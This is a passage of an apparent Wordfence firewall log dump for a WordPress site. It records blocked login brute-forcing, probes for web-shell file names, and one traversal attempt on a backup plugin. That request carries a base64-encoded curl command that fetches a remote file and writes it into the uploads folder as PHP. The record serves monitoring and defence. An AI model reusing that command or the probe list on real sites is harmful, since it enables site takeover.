User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzB4MTk0OS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14805,1704734022.929174,1704734022.823200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(14556,1704639141.185906,1704639141.121600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/pm.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcG0ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14492,1704638870.337593,1704638870.283100,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/0x1949.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzB4MTk0OS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15151,0.000000,1704851140.512431,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14491,1704638876.332749,1704638876.283500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/o.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L28ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15152,0.000000,1704851140.513655,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14658,0.000000,1704679856.228879,' A\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14557,1704639136.289759,1704639136.205400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/pm.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcG0ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14490,1704638880.448100,1704638880.388300,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/o.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L28ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14659,1704679856.974585,1704679856.918400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"Y3VybCAtbyAuLi8uLi8uLi91cGxvYWRzL3dwLXl5dWUucGhwIGh0dHBzOi8vcmVudHJ5LmNvL201bjd3ZS9yYXc=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14489,1704638887.062430,1704638887.007300,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/casper.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nhc3Blci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14558,1704639128.819285,1704639128.730500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/.cache.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5jYWNoZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15153,0.000000,1704851278.547336,'\0\0\0\0\0\0\0\0\0\0=&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14804,1704734028.319994,1704734028.245500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(14488,1704638891.852228,1704638891.798900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/casper.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nhc3Blci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15154,1704851659.955151,1704851659.862800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14813,1704734482.317129,1704734482.228000,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQv\",\"category\":\"brute-force\",\"ssl\":1}'),(14559,1704639122.944181,1704639122.866500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/.cache.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5jYWNoZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14487,1704638896.990049,1704638896.937500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/p0wny.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3Awd255LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14486,1704638901.717520,1704638901.656300,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/p0wny.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3Awd255LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14485,1704638907.768246,1704638907.716100,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/mari.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21hcmkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14560,1704639117.128743,1704639117.037100,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/i.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2kucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14803,1704734033.568320,1704734033.483800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/vendor/phpunit/phpunit/src/Util/PHP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(14484,1704638912.158143,1704638912.093700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/mari.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21hcmkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15155,1704851659.943987,1704851659.862400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14561,1704639111.472186,1704639111.413200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/i.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2kucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15156,0.000000,1704852115.784514,'\0\0\0\0\0\0\0\0\0\0RL',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14482,0.000000,1704638613.988985,'\0\0\0\0\0\0\0\0\0\08',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14483,1704638918.093995,1704638918.030300,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/wp.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvd3AucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14481,1704638502.908625,1704638502.825400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/y.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3kucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14562,1704639104.547574,1704639104.480100,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15157,0.000000,1704852226.929161,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15158,0.000000,1704852227.019035,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14802,1704734038.059348,1704734037.961000,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/upload/image/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(14480,1704638508.427919,1704638508.343400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/y.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3kucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14814,1704734477.722288,1704734477.654500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/user/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 